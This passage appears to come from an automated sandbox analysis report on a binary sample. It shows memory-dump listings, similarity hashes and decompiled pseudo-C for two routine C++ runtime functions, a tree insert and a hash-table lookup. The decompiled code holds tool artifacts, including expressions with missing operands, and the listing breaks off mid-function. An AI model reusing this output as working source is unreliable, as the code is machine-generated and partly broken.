Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$AllocCloseExitFreeHandleLibraryLoadObjectProcessSingleWaitwsprintf
String ID: !i*#
API String ID: 4252355541-3015727794
Opcode ID: 480bff7e476af6a78cf3e472e0223fb3b2e71bb8ae0a09ead142851c321c18a4
Instruction ID: 66c5368bb119c3126dc77517f8e4a71596cfb1d5570d5741b7968d28aaa55aa9
Opcode Fuzzy Hash: 480bff7e476af6a78cf3e472e0223fb3b2e71bb8ae0a09ead142851c321c18a4
Instruction Fuzzy Hash: FC6142B08043689FDB20DFA5D985ACEBBB8FF04300F10869EE19A7B650DB305A85CF55

Uniqueness

Uniqueness Score: 100.00%

Function 0040E5D0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93
UNIQUE

Download Yara Rule

C-Code - Quality: 80%

			E0040E5D0(intOrPtr* __ecx, void* __edx, signed int* _a4) {
				char _v0;
				char* _v4;
				signed int _v8;
				char* _v12;
				intOrPtr* _v28;
				intOrPtr* _v32;
				intOrPtr* _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t115;
				char* _t118;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				intOrPtr* _t128;
				intOrPtr _t130;
				intOrPtr* _t131;
				intOrPtr _t132;
				intOrPtr* _t133;
				signed int _t134;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				signed int _t140;
				intOrPtr _t145;
				signed int _t147;
				signed int _t156;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t170;
				signed int _t171;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				intOrPtr _t186;
				signed int _t188;
				signed int _t189;
				intOrPtr* _t190;
				signed int* _t198;
				signed int _t199;
				signed int _t200;
				void* _t201;
				intOrPtr _t202;
				signed int _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t222;
				signed int _t223;
				signed int _t229;
				intOrPtr _t231;
				intOrPtr* _t232;
				intOrPtr* _t233;
				signed int _t234;
				intOrPtr _t235;
				intOrPtr _t236;
				signed int _t237;
				intOrPtr* _t238;
				intOrPtr* _t246;
				signed int* _t247;
				signed int _t248;
				intOrPtr* _t249;
				intOrPtr _t250;
				intOrPtr* _t252;
				intOrPtr _t253;
				char* _t262;
				signed int _t263;
				void* _t270;

				_push(__ecx);
				_t246 = __ecx;
				_t115 =  *__ecx;
				_t280 = _t115;
				if(_t115 != 0) {
					_t198 = _a4;
					__eflags = _t198 -  *_t115;
					if(_t198 ==  *_t115) {
						_v4 = "Repeated information";
						E00416C8D( &_v4, 0x447c2c);
						asm("int3");
						_push(_t198);
						_push(_t246);
						_t247 = _t198;
						_t199 =  *_t247;
						__eflags = _t199;
						if(__eflags != 0) {
							_t118 = _v4;
							__eflags = _t118 -  *_t199;
							if(__eflags == 0) {
								_v12 = "Repeated information";
								E00416C8D( &_v12, 0x447c2c);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t262 = _v12;
								_push(_t247);
								_t248 = _t199;
								_t200 =  *(_t248 + 0x10);
								__eflags = _t200 - _t262;
								if(__eflags < 0) {
									_push("invalid string position");
									E0041371B(_t188, _t237, __eflags);
									goto L79;
								} else {
									_push(_t188);
									_t188 = _v8;
									__eflags =  !_t200 - _t188;
									if(__eflags <= 0) {
										L79:
										_push("string too long");
										E004136FB(_t188, _t237, __eflags);
										goto L80;
									} else {
										_push(_t237);
										_t237 = _t200 + _t188;
										__eflags = _t188;
										if(_t188 == 0) {
											L77:
											return _t248;
										} else {
											__eflags = _t237 - 0xfffffffe;
											if(__eflags > 0) {
												L80:
												_push("string too long");
												E004136FB(_t188, _t237, __eflags);
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t188);
												_push(_t262);
												_push(_t248);
												_push(_t237);
												_t238 = _v28;
												_t189 = _t200;
												__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
												_t263 =  *(_t238 + 0x10);
												if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
													_t249 = _t238;
												} else {
													_t249 =  *_t238;
												}
												_t201 = 0;
												_t229 = 0x811c9dc5;
												__eflags = _t263;
												if(_t263 != 0) {
													do {
														_t140 =  *(_t249 + _t201) & 0x000000ff;
														_t201 = _t201 + 1;
														_t229 = (_t140 ^ _t229) * 0x1000193;
														__eflags = _t201 - _t263;
													} while (_t201 < _t263);
												}
												_t202 =  *((intOrPtr*)(_t189 + 0xc));
												_t125 =  *(_t189 + 0x18) & _t229;
												_t126 = _t125 + _t125;
												_v48 =  *((intOrPtr*)(_t202 + _t125 * 8));
												_t231 =  *((intOrPtr*)(_t189 + 4));
												_t190 = _v48;
												_t250 =  *((intOrPtr*)(_t202 + _t126 * 4));
												_t127 = _t126 + 1;
												__eflags = _t127;
												_v44 = _t250;
												_v28 = _t231;
												_t128 = _t202 + _t127 * 4;
												_v40 = _t128;
												while(1) {
													__eflags = _t250 - _t231;
													if(_t250 != _t231) {
														_t130 =  *((intOrPtr*)( *_t128));
													} else {
														_t130 = _t231;
													}
													__eflags = _t190 - _t130;
													if(_t190 == _t130) {
														break;
													}
													__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
													if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
														_t252 = _t238;
													} else {
														_t252 =  *_t238;
													}
													__eflags =  *((intOrPtr*)(_t190 + 0x1c)) - 0x10;
													if( *((intOrPtr*)(_t190 + 0x1c)) < 0x10) {
														_t232 = _t190 + 8;
													} else {
														_t232 =  *((intOrPtr*)(_t190 + 8));
													}
													_t132 =  *((intOrPtr*)(_t190 + 0x18));
													__eflags = _t132 - _t263;
													_v48 = _t132;
													_t204 =  <  ? _t132 : _t263;
													__eflags = _t204;
													if(_t204 == 0) {
														L113:
														__eflags = _t132 - _t263;
														if(__eflags < 0 || __eflags > 0) {
															goto L115;
														} else {
															__eflags =  *((intOrPtr*)(_t190 + 0x1c)) - 0x10;
															if( *((intOrPtr*)(_t190 + 0x1c)) < 0x10) {
																_t233 = _t190 + 8;
															} else {
																_t233 =  *((intOrPtr*)(_t190 + 8));
															}
															__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
															if( *((intOrPtr*)(_t238 + 0x14)) >= 0x10) {
																_t238 =  *_t238;
															}
															_t253 =  *((intOrPtr*)(_t190 + 0x18));
															__eflags = _t263 - _t253;
															_t206 =  <  ? _t263 : _t253;
															__eflags = _t206;
															if(_t206 == 0) {
																L137:
																__eflags = _t263 - _t253;
																if(__eflags < 0 || __eflags > 0) {
																	goto L139;
																}
															} else {
																_t207 = _t206 - 4;
																__eflags = _t207;
																if(_t207 < 0) {
																	L126:
																	__eflags = _t207 - 0xfffffffc;
																	if(_t207 == 0xfffffffc) {
																		goto L135;
																	} else {
																		goto L127;
																	}
																} else {
																	while(1) {
																		__eflags =  *_t238 -  *_t233;
																		if( *_t238 !=  *_t233) {
																			break;
																		}
																		_t238 = _t238 + 4;
																		_t233 = _t233 + 4;
																		_t207 = _t207 - 4;
																		__eflags = _t207;
																		if(_t207 >= 0) {
																			continue;
																		} else {
																			goto L126;
																		}
																		goto L136;
																	}
																	L127:
																	_t135 =  *_t238;
																	__eflags = _t135 -  *_t233;
																	if(_t135 !=  *_t233) {
																		L134:
																		asm("sbb eax, eax");
																		_t134 = _t135 | 0x00000001;
																	} else {
																		__eflags = _t207 - 0xfffffffd;
																		if(_t207 == 0xfffffffd) {
																			L135:
																			_t134 = 0;
																			__eflags = 0;
																		} else {
																			_t135 =  *((intOrPtr*)(_t238 + 1));
																			__eflags = _t135 -  *((intOrPtr*)(_t233 + 1));
																			if(_t135 !=  *((intOrPtr*)(_t233 + 1))) {
																				goto L134;
																			} else {
																				__eflags = _t207 - 0xfffffffe;
																				if(_t207 == 0xfffffffe) {
																					goto L135;
																				} else {
																					_t135 =  *((intOrPtr*)(_t238 + 2));
																					__eflags = _t135 -  *((intOrPtr*)(_t233 + 2));
																					if(_t135 !=  *((intOrPtr*)(_t233 + 2))) {
																						goto L134;
																					} else {
																						__eflags = _t207 - 0xffffffff;
																						if(_t207 == 0xffffffff) {
																							goto L135;
																						} else {
																							_t135 =  *((intOrPtr*)(_t238 + 3));
																							__eflags = _t135 -  *((intOrPtr*)(_t233 + 3));
																							if(_t135 ==  *((intOrPtr*)(_t233 + 3))) {
																								goto L135;
																							} else {
																								goto L134;
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
																L136:
																__eflags = _t134;
																if(_t134 != 0) {
																	L139:
																	_t190 = _v28;
																} else {
																	goto L137;
																}
															}
															_t133 = _v32;
															 *_t133 = _t190;
															return _t133;
														}
													} else {
														_t208 = _t204 - 4;
														__eflags = _t208;
														if(_t208 < 0) {
															L101:
															__eflags = _t208 - 0xfffffffc;
															if(_t208 == 0xfffffffc) {
																goto L110;
															} else {
																goto L102;
															}
														} else {
															while(1) {
																__eflags =  *_t232 -  *_t252;
																if( *_t232 !=  *_t252) {
																	break;
																}
																_t232 = _t232 + 4;
																_t252 = _t252 + 4;
																_t208 = _t208 - 4;
																__eflags = _t208;
																if(_t208 >= 0) {
																	continue;
																} else {
																	goto L101;
																}
																goto L111;
															}
															L102:
															_t138 =  *_t232;
															__eflags = _t138 -  *_t252;
															if(_t138 !=  *_t252) {
																L109:
																asm("sbb eax, eax");
																_t137 = _t138 | 0x00000001;
															} else {
																__eflags = _t208 - 0xfffffffd;
																if(_t208 == 0xfffffffd) {
																	L110:
																	_t137 = 0;
																	__eflags = 0;
																} else {
																	_t138 =  *((intOrPtr*)(_t232 + 1));
																	__eflags = _t138 -  *((intOrPtr*)(_t252 + 1));
																	if(_t138 !=  *((intOrPtr*)(_t252 + 1))) {
																		goto L109;
																	} else {
																		__eflags = _t208 - 0xfffffffe;
																		if(_t208 == 0xfffffffe) {
																			goto L110;
																		} else {
																			_t138 =  *((intOrPtr*)(_t232 + 2));
																			__eflags = _t138 -  *((intOrPtr*)(_t252 + 2));
																			if(_t138 !=  *((intOrPtr*)(_t252 + 2))) {
																				goto L109;
																			} else {
																				__eflags = _t208 - 0xffffffff;
																				if(_t208 == 0xffffffff) {
																					goto L110;
																				} else {
																					_t138 =  *((intOrPtr*)(_t232 + 3));
																					__eflags = _t138 -  *((intOrPtr*)(_t252 + 3));
																					if(_t138 ==  *((intOrPtr*)(_t252 + 3))) {
																						goto L110;
																					} else {
																						goto L109;
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
														L111:
														__eflags = _t137;
														if(_t137 != 0) {
															L115:
															_t190 =  *_t190;
															_t231 = _v28;
															_t250 = _v44;
															_t128 = _v40;
															continue;
														} else {
															_t132 = _v48;
															goto L113;
														}
													}
													goto L142;
												}
												_t131 = _v32;
												 *_t131 = _t231;
												return _t131;
											} else {
												__eflags =  *((intOrPtr*)(_t248 + 0x14)) - _t237;
												if( *((intOrPtr*)(_t248 + 0x14)) >= _t237) {
													__eflags = _t237;
													if(_t237 != 0) {
														goto L62;
													} else {
														 *(_t248 + 0x10) = _t237;
														__eflags =  *((intOrPtr*)(_t248 + 0x14)) - 0x10;
														if( *((intOrPtr*)(_t248 + 0x14)) < 0x10) {
															_t156 = _t248;
															 *_t156 = 0;
															return _t156;
														} else {
															 *( *_t248) = 0;
															return _t248;
														}
													}
												} else {
													E004077E0(_t248, _t237, _t200);
													__eflags = _t237;
													if(_t237 == 0) {
														goto L77;
													} else {
														L62:
														_t145 =  *((intOrPtr*)(_t248 + 0x14));
														__eflags = _t145 - 0x10;
														if(_t145 < 0x10) {
															_t234 = _t248;
														} else {
															_t234 =  *_t248;
														}
														__eflags = _t145 - 0x10;
														if(_t145 < 0x10) {
															_t209 = _t248;
														} else {
															_t209 =  *_t248;
														}
														_t147 =  *(_t248 + 0x10) - _t262;
														__eflags = _t147;
														if(_t147 != 0) {
															__eflags =  &(( &(_t262[_t209]))[_t188]);
															E00416560( &(( &(_t262[_t209]))[_t188]),  &(_t262[_t234]), _t147);
														}
														E004072A0(_t248, _t262, _t188, _v4);
														__eflags =  *((intOrPtr*)(_t248 + 0x14)) - 0x10;
														 *(_t248 + 0x10) = _t237;
														if( *((intOrPtr*)(_t248 + 0x14)) < 0x10) {
															 *((char*)(_t248 + _t237)) = 0;
															goto L77;
														} else {
															 *((char*)( *_t248 + _t237)) = 0;
															return _t248;
														}
													}
												}
											}
										}
									}
								}
							} else {
								_t26 =  &_v0; // 0x447c2c
								_t235 =  *_t26;
								if(__eflags < 0) {
									L41:
									__eflags = _t247[1];
									if(__eflags == 0) {
										_t166 = E0041500C(_t235, __eflags, 0x14);
										__eflags = _t166;
										if(_t166 == 0) {
											_t167 = 0;
											__eflags = 0;
										} else {
											_t167 = E00404160(_t166);
										}
										_t235 = _v0;
										_t247[1] = _t167;
										_t118 = _v4;
									}
								} else {
									__eflags =  *_t199 - _t118;
									if( *_t199 < _t118) {
										L36:
										__eflags = _t247[2];
										if(__eflags != 0) {
											L40:
										} else {
											_t168 = E0041500C(_t235, __eflags, 0x14);
											__eflags = _t168;
											if(_t168 == 0) {
												_t235 = _v0;
												__eflags = 0;
												_t247[2] = 0;
												_t118 = _v4;
												goto L40;
											} else {
												_t170 = E00404160(_t168);
												_t235 = _v0;
												_t247[2] = _t170;
												_t118 = _v4;
											}
										}
									} else {
										__eflags = _t235 -  *((intOrPtr*)(_t199 + 4));
										if(_t235 <  *((intOrPtr*)(_t199 + 4))) {
											goto L41;
										} else {
											goto L36;
										}
									}
								}
								_push(_t235);
								_push(_t118);
								L28();
								goto L48;
							}
						} else {
							_t171 = E0041500C(__edx, __eflags, 8);
							__eflags = _t171;
							if(_t171 == 0) {
								_t247[4] = 1;
								 *_t247 = 0;
							} else {
								 *_t171 = _v4;
								 *((intOrPtr*)(_t171 + 4)) = _v0;
								 *_t247 = _t171;
								_t247[4] = 1;
							}
							L48:
							_t247[3] = _t247[3] + 1;
							_t160 = _t247[2];
							__eflags = _t160;
							if(_t160 == 0) {
								_t213 = 0;
								__eflags = 0;
							} else {
								_t213 =  *((intOrPtr*)(_t160 + 0x10));
							}
							_t161 = _t247[1];
							__eflags = _t161;
							if(_t161 == 0) {
								_t162 = 0;
								__eflags = 0;
							} else {
								_t162 =  *((intOrPtr*)(_t161 + 0x10));
							}
							__eflags = _t213 - _t162;
							_t163 =  >  ? _t213 : _t162;
							_t164 = ( >  ? _t213 : _t162) + 1;
							__eflags = _t164;
							_t247[4] = _t164;
							return E0040F6C0(_t247);
						}
					} else {
						_t236 =  *_t115;
						__eflags = _t198 - _t236;
						if(_t198 < _t236) {
							L13:
							__eflags =  *(_t246 + 4);
							if(__eflags == 0) {
								_t181 = E0041500C(_t236, __eflags, 0x14);
								_t270 = _t270 + 4;
								__eflags = _t181;
								if(_t181 == 0) {
									_t182 = 0;
									__eflags = 0;
								} else {
									_t182 = E00404160(_t181);
								}
								 *(_t246 + 4) = _t182;
							}
							_t222 =  *(_t246 + 4);
						} else {
							__eflags = _t236 - _t198;
							if(__eflags < 0) {
								L8:
								__eflags =  *(_t246 + 8);
								if(__eflags != 0) {
									L12:
									_t222 =  *(_t246 + 8);
								} else {
									_t183 = E0041500C(_t236, __eflags, 0x14);
									_t270 = _t270 + 4;
									__eflags = _t183;
									if(_t183 == 0) {
										__eflags = 0;
										 *(_t246 + 8) = 0;
										goto L12;
									} else {
										_t185 = E00404160(_t183);
										 *(_t246 + 8) = _t185;
										_t222 = _t185;
									}
								}
							} else {
								asm("movsd xmm0, [eax+0x8]");
								asm("comisd xmm0, [esp+0x14]");
								if(__eflags > 0) {
									goto L13;
								} else {
									goto L8;
								}
							}
						}
						asm("movups xmm0, [esp+0xc]");
						asm("movups [eax], xmm0");
						E0040E5D0(_t222, _t236);
						goto L20;
					}
				} else {
					_t186 = E0041500C(__edx, _t280, 0x10);
					if(_t186 == 0) {
						 *(_t246 + 0x10) = 1;
						 *_t246 = 0;
					} else {
						asm("movups xmm0, [esp+0xc]");
						asm("movups [eax], xmm0");
						 *_t246 = _t186;
						 *(_t246 + 0x10) = 1;
					}
					L20:
					 *((intOrPtr*)(_t246 + 0xc)) =  *((intOrPtr*)(_t246 + 0xc)) + 1;
					_t175 =  *(_t246 + 8);
					if(_t175 == 0) {
						_t223 = 0;
						__eflags = 0;
					} else {
						_t223 =  *((intOrPtr*)(_t175 + 0x10));
					}
					_t176 =  *(_t246 + 4);
					if(_t176 == 0) {
						_t177 = 0;
						__eflags = 0;
					} else {
						_t177 =  *((intOrPtr*)(_t176 + 0x10));
					}
					_t178 =  >  ? _t223 : _t177;
					_t179 = ( >  ? _t223 : _t177) + 1;
					 *(_t246 + 0x10) = ( >  ? _t223 : _t177) + 1;
					return E0040F6C0(_t246);
				}
				L142:
			}

0x0040e5d0
0x0040e5d2
0x0040e5d4
0x0040e5d6
0x0040e5d8
0x0040e60e
0x0040e612
0x0040e614
0x0040e6d1
0x0040e6da
0x0040e6df
0x0040e6e0
0x0040e6e1
0x0040e6e2
0x0040e6e4
0x0040e6e6
0x0040e6e8
0x0040e723
0x0040e727
0x0040e729
0x0040e7ec
0x0040e7f5
0x0040e7fa
0x0040e7fb
0x0040e7fc
0x0040e7fd
0x0040e7fe
0x0040e7ff
0x0040e801
0x0040e805
0x0040e806
0x0040e808
0x0040e80b
0x0040e80d
0x0040e8dd
0x0040e8e2
0x00000000
0x0040e813
0x0040e815
0x0040e816
0x0040e81c
0x0040e81e
0x0040e8e7
0x0040e8e7
0x0040e8ec
0x00000000
0x0040e824
0x0040e824
0x0040e825
0x0040e828
0x0040e82a
0x0040e8d4
0x0040e8da
0x0040e830
0x0040e830
0x0040e833
0x0040e8f1
0x0040e8f1
0x0040e8f6
0x0040e8fb
0x0040e8fc
0x0040e8fd
0x0040e8fe
0x0040e8ff
0x0040e903
0x0040e904
0x0040e905
0x0040e906
0x0040e907
0x0040e90b
0x0040e90d
0x0040e911
0x0040e914
0x0040e91a
0x0040e916
0x0040e916
0x0040e916
0x0040e91c
0x0040e91e
0x0040e923
0x0040e925
0x0040e927
0x0040e927
0x0040e92b
0x0040e92e
0x0040e934
0x0040e934
0x0040e927
0x0040e93b
0x0040e93e
0x0040e943
0x0040e945
0x0040e949
0x0040e94c
0x0040e950
0x0040e953
0x0040e953
0x0040e954
0x0040e958
0x0040e95c
0x0040e95f
0x0040e963
0x0040e963
0x0040e965
0x0040e96d
0x0040e967
0x0040e967
0x0040e967
0x0040e96f
0x0040e971
0x00000000
0x00000000
0x0040e977
0x0040e97b
0x0040e981
0x0040e97d
0x0040e97d
0x0040e97d
0x0040e983
0x0040e987
0x0040e98e
0x0040e989
0x0040e989
0x0040e989
0x0040e991
0x0040e996
0x0040e998
0x0040e99c
0x0040e99f
0x0040e9a1
0x0040e9fc
0x0040e9fc
0x0040e9fe
0x00000000
0x0040ea15
0x0040ea15
0x0040ea19
0x0040ea20
0x0040ea1b
0x0040ea1b
0x0040ea1b
0x0040ea23
0x0040ea27
0x0040ea29
0x0040ea29
0x0040ea2b
0x0040ea2e
0x0040ea32
0x0040ea35
0x0040ea37
0x0040ea90
0x0040ea90
0x0040ea92
0x00000000
0x00000000
0x0040ea39
0x0040ea39
0x0040ea39
0x0040ea3c
0x0040ea51
0x0040ea51
0x0040ea54
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ea40
0x0040ea40
0x0040ea42
0x0040ea44
0x00000000
0x00000000
0x0040ea46
0x0040ea49
0x0040ea4c
0x0040ea4c
0x0040ea4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ea4f
0x0040ea56
0x0040ea56
0x0040ea58
0x0040ea5a
0x0040ea83
0x0040ea83
0x0040ea85
0x0040ea5c
0x0040ea5c
0x0040ea5f
0x0040ea8a
0x0040ea8a
0x0040ea8a
0x0040ea61
0x0040ea61
0x0040ea64
0x0040ea67
0x00000000
0x0040ea69
0x0040ea69
0x0040ea6c
0x00000000
0x0040ea6e
0x0040ea6e
0x0040ea71
0x0040ea74
0x00000000
0x0040ea76
0x0040ea76
0x0040ea79
0x00000000
0x0040ea7b
0x0040ea7b
0x0040ea7e
0x0040ea81
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ea81
0x0040ea79
0x0040ea74
0x0040ea6c
0x0040ea67
0x0040ea5f
0x0040ea5a
0x0040ea8c
0x0040ea8c
0x0040ea8e
0x0040ea96
0x0040ea96
0x00000000
0x00000000
0x00000000
0x0040ea8e
0x0040ea9a
0x0040eaa1
0x0040eaa7
0x0040eaa7
0x0040e9a3
0x0040e9a3
0x0040e9a3
0x0040e9a6
0x0040e9b9
0x0040e9b9
0x0040e9bc
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e9a8
0x0040e9a8
0x0040e9aa
0x0040e9ac
0x00000000
0x00000000
0x0040e9ae
0x0040e9b1
0x0040e9b4
0x0040e9b4
0x0040e9b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e9b7
0x0040e9be
0x0040e9be
0x0040e9c0
0x0040e9c2
0x0040e9eb
0x0040e9eb
0x0040e9ed
0x0040e9c4
0x0040e9c4
0x0040e9c7
0x0040e9f2
0x0040e9f2
0x0040e9f2
0x0040e9c9
0x0040e9c9
0x0040e9cc
0x0040e9cf
0x00000000
0x0040e9d1
0x0040e9d1
0x0040e9d4
0x00000000
0x0040e9d6
0x0040e9d6
0x0040e9d9
0x0040e9dc
0x00000000
0x0040e9de
0x0040e9de
0x0040e9e1
0x00000000
0x0040e9e3
0x0040e9e3
0x0040e9e6
0x0040e9e9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e9e9
0x0040e9e1
0x0040e9dc
0x0040e9d4
0x0040e9cf
0x0040e9c7
0x0040e9c2
0x0040e9f4
0x0040e9f4
0x0040e9f6
0x0040ea02
0x0040ea02
0x0040ea04
0x0040ea08
0x0040ea0c
0x00000000
0x0040e9f8
0x0040e9f8
0x00000000
0x0040e9f8
0x0040e9f6
0x00000000
0x0040e9a1
0x0040eaaa
0x0040eab1
0x0040eab7
0x0040e839
0x0040e839
0x0040e83c
0x0040e85b
0x0040e85d
0x00000000
0x0040e85f
0x0040e85f
0x0040e862
0x0040e866
0x0040e877
0x0040e87c
0x0040e87f
0x0040e868
0x0040e86c
0x0040e873
0x0040e873
0x0040e866
0x0040e83e
0x0040e842
0x0040e847
0x0040e849
0x00000000
0x0040e84f
0x0040e84f
0x0040e84f
0x0040e852
0x0040e855
0x0040e882
0x0040e857
0x0040e857
0x0040e857
0x0040e884
0x0040e887
0x0040e88d
0x0040e889
0x0040e889
0x0040e889
0x0040e892
0x0040e892
0x0040e894
0x0040e89e
0x0040e8a1
0x0040e8a6
0x0040e8b1
0x0040e8b6
0x0040e8ba
0x0040e8bd
0x0040e8d0
0x00000000
0x0040e8bf
0x0040e8c1
0x0040e8cb
0x0040e8cb
0x0040e8bd
0x0040e849
0x0040e83c
0x0040e833
0x0040e82a
0x0040e81e
0x0040e72f
0x0040e72f
0x0040e72f
0x0040e733
0x0040e77b
0x0040e77b
0x0040e77f
0x0040e783
0x0040e78b
0x0040e78d
0x0040e798
0x0040e798
0x0040e78f
0x0040e791
0x0040e791
0x0040e79a
0x0040e79e
0x0040e7a1
0x0040e7a1
0x0040e735
0x0040e735
0x0040e737
0x0040e73e
0x0040e73e
0x0040e742
0x0040e776
0x0040e744
0x0040e746
0x0040e74e
0x0040e750
0x0040e769
0x0040e76d
0x0040e76f
0x0040e772
0x00000000
0x0040e752
0x0040e754
0x0040e759
0x0040e75d
0x0040e760
0x0040e764
0x0040e750
0x0040e739
0x0040e739
0x0040e73c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e73c
0x0040e737
0x0040e7a8
0x0040e7a9
0x0040e7aa
0x00000000
0x0040e7aa
0x0040e6ea
0x0040e6ec
0x0040e6f4
0x0040e6f6
0x0040e715
0x0040e71c
0x0040e6f8
0x0040e6fc
0x0040e702
0x0040e705
0x0040e707
0x0040e707
0x0040e7af
0x0040e7af
0x0040e7b2
0x0040e7b5
0x0040e7b7
0x0040e7be
0x0040e7be
0x0040e7b9
0x0040e7b9
0x0040e7b9
0x0040e7c0
0x0040e7c3
0x0040e7c5
0x0040e7cc
0x0040e7cc
0x0040e7c7
0x0040e7c7
0x0040e7c7
0x0040e7ce
0x0040e7d0
0x0040e7d5
0x0040e7d5
0x0040e7d6
0x0040e7e0
0x0040e7e0
0x0040e61a
0x0040e61a
0x0040e61c
0x0040e61e
0x0040e65d
0x0040e65d
0x0040e661
0x0040e665
0x0040e66a
0x0040e66d
0x0040e66f
0x0040e67a
0x0040e67a
0x0040e671
0x0040e673
0x0040e673
0x0040e67c
0x0040e67c
0x0040e67f
0x0040e620
0x0040e620
0x0040e622
0x0040e631
0x0040e631
0x0040e635
0x0040e658
0x0040e658
0x0040e637
0x0040e639
0x0040e63e
0x0040e641
0x0040e643
0x0040e653
0x0040e655
0x00000000
0x0040e645
0x0040e647
0x0040e64c
0x0040e64f
0x0040e64f
0x0040e643
0x0040e624
0x0040e624
0x0040e629
0x0040e62f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e62f
0x0040e622
0x0040e682
0x0040e68c
0x0040e68f
0x00000000
0x0040e68f
0x0040e5da
0x0040e5dc
0x0040e5e6
0x0040e600
0x0040e607
0x0040e5e8
0x0040e5e8
0x0040e5ed
0x0040e5f0
0x0040e5f2
0x0040e5f2
0x0040e694
0x0040e694
0x0040e697
0x0040e69c
0x0040e6a3
0x0040e6a3
0x0040e69e
0x0040e69e
0x0040e69e
0x0040e6a5
0x0040e6aa
0x0040e6b1
0x0040e6b1
0x0040e6ac
0x0040e6ac
0x0040e6ac
0x0040e6b5
0x0040e6ba
0x0040e6bb
0x0040e6c5
0x0040e6c5
0x00000000

APIs

new.LIBCMT ref: 0040E639

Part of subcall function 0040E5D0: new.LIBCMT ref: 0040E5DC

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E6DA

Part of subcall function 00416C8D: KiUserExceptionDispatcher.NTDLL(?,?,0041371A,?,00000008,?,1FFFFFFF,?,?,?,?,0041371A,?,00447D68,?), ref: 00416CEC

new.LIBCMT ref: 0040E665

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

Strings

,|D, xrefs: 0040E7A8

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_taskDispatcherExceptionException@8ThrowUser
String ID: ,|D
API String ID: 3328717637-1009636837
Opcode ID: e7ea83e8da535396e71ce8d96b0951da232bd45ac0286463f62d858af1a5f132
Instruction ID: c6ad7b4f82c2a7abab8fde6ca928e396d277543763013e5716281b2a24dec004
Opcode Fuzzy Hash: e7ea83e8da535396e71ce8d96b0951da232bd45ac0286463f62d858af1a5f132
Instruction Fuzzy Hash: 45319C70B047018ED7249F36E44072BB3E0AF64304F508C3FA49AE76D1EB79E8A48B49

Uniqueness

Uniqueness Score: 100.00%

Function 00429375, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E00429375(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E0042C2CD(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E0042C2CD(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E0041A8B9(GetLastError());
									_t17 =  *((intOrPtr*)(E0041A8EF(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00422110(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E0041A8B9(GetLastError());
						_t17 =  *((intOrPtr*)(E0041A8EF(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00422110(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
